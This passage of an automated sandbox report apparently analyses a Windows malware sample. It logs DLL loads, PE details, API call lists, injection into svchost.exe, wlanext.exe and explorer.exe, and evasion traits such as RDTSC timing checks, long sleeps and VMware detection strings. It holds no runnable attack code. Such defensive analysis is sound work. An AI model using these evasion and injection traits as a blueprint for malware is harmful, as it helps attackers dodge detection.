          Source: C:\Windows\explorer.exeSection loaded: wpnclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ncsi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wpdshserviceobj.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: portabledevicetypes.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: portabledeviceapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cscobj.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: srchadmin.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: synccenter.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: imapi2.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: storageusage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: fhcfg.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: efsutil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.system.userprofile.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cloudexperiencehostbroker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: credui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wdscore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: file.exeStatic file information: File size 1482240 > 1048576
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: file.exe, 00000000.00000003.1653421088.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1653291010.00000000038F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710817666.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1653864785.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710817666.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1655820740.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2918452334.00000000033CE000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2918452334.0000000003230000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1710636242.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1713704184.000000000307F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: file.exe, 00000000.00000003.1653421088.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1653291010.00000000038F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1710817666.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1653864785.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710817666.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1655820740.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000004.00000002.2918452334.00000000033CE000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2918452334.0000000003230000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1710636242.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1713704184.000000000307F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: svchost.exe, 00000001.00000003.1710078947.000000000281C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1710157021.000000000282E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710780158.0000000002E30000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000004.00000002.2916594410.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.2703671966.0000000010ECF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.2916106098.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2920530492.000000000377F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.2999055949.000000000BB3F000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.2703671966.0000000010ECF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.2916106098.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2920530492.000000000377F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.2999055949.000000000BB3F000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: svchost.exe, 00000001.00000003.1710078947.000000000281C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1710157021.000000000282E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710780158.0000000002E30000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.2916594410.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDE01E LoadLibraryA,GetProcAddress,0_2_00EDE01E
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEC09E push esi; ret 0_2_00EEC0A0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEC187 push edi; ret 0_2_00EEC189
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F2C8BC push esi; ret 0_2_00F2C8BE
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE6B05 push ecx; ret 0_2_00EE6B18
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0B2B1 push FFFFFF8Bh; iretd 0_2_00F0B2B3
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEBDAA push edi; ret 0_2_00EEBDAC
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEBEC3 push esi; ret 0_2_00EEBEC5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD push ecx; mov dword ptr [esp], ecx1_2_02F309B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AD4DB push eax; ret 1_2_024AD542
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AD4D2 push eax; ret 1_2_024AD4D8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AD485 push eax; ret 1_2_024AD4D8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AD53C push eax; ret 1_2_024AD542
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A6B48 push ebp; retf 1_2_024A6B63
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02499BA9 push ecx; ret 1_2_02499BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02499BA9 push ecx; ret 1_2_02499BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A7933 push esi; ret 1_2_024A7934
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AE9AD push dword ptr [D2425A3Fh]; ret 1_2_024AE9CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A7D70 push ebx; ret 1_2_024A7D7D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A7D9A push ebx; ret 1_2_024A7D7D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E0EB02 push esp; retn 0000h1_2_02E0EB03
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E0EB1E push esp; retn 0000h1_2_02E0EB1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E0E9B5 push esp; retn 0000h1_2_02E0EAE7
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5BEB1E push esp; retn 0000h2_2_0E5BEB1F
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5BEB02 push esp; retn 0000h2_2_0E5BEB03
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5BE9B5 push esp; retn 0000h2_2_0E5BEAE7
          Source: C:\Windows\explorer.exeCode function: 2_2_0F644B02 push esp; retn 0000h2_2_0F644B03
          Source: C:\Windows\explorer.exeCode function: 2_2_0F644B1E push esp; retn 0000h2_2_0F644B1F
          Source: C:\Windows\explorer.exeCode function: 2_2_0F6449B5 push esp; retn 0000h2_2_0F644AE7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00DE003D push ecx; ret 4_2_00DE0050
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0323225F pushad ; ret 4_2_032327F9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032327FA pushad ; ret 4_2_032327F9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F28111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00F28111
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00EDEB42
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EE123A
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
          Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 116EA74
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 2499904 second address: 249990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 2499B7E second address: 2499B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: AA9904 second address: AA990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: AA9B7E second address: AA9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E rdtsc 1_2_02F7096E
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8227Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1715Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 883Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeWindow / User API: threadDelayed 2125Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeWindow / User API: threadDelayed 7848Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-94115
          Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-92846
          Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.1 %
          Source: C:\Windows\SysWOW64\wlanext.exeAPI coverage: 1.9 %
          Source: C:\Windows\explorer.exe TID: 5680Thread sleep count: 8227 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5680Thread sleep time: -16454000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5680Thread sleep count: 1715 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5680Thread sleep time: -3430000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4564Thread sleep count: 2125 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4564Thread sleep time: -4250000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4564Thread sleep count: 7848 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4564Thread sleep time: -15696000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F06CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F06CA9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00F060DD
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00F063F9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F0EB60
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F0F5FA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0F56F FindFirstFileW,FindClose,0_2_00F0F56F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F11B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F11B2F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F11C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F11C8A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F11F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F11F94
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00EDDDC0
          Source: explorer.exe, 0000000E.00000003.2809741840.000000000C93C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&0000009
          Source: explorer.exe, 0000000E.00000002.3020099476.000000000C914000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000E.00000003.2842304011.000000000C9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\W%
          Source: explorer.exe, 0000000E.00000003.2810762263.000000000C9EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 0000000E.00000002.2915536056.00000000010B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
          Source: explorer.exe, 00000002.00000000.1666389880.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1666389880.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2757327610.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2756647360.0000000008BBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2759463739.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008BBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008BFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 0000000E.00000003.2842304011.000000000C9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\d%
          Source: explorer.exe, 0000000E.00000003.2810762263.000000000C9EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 0000000E.00000003.2811183670.000000000C830000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
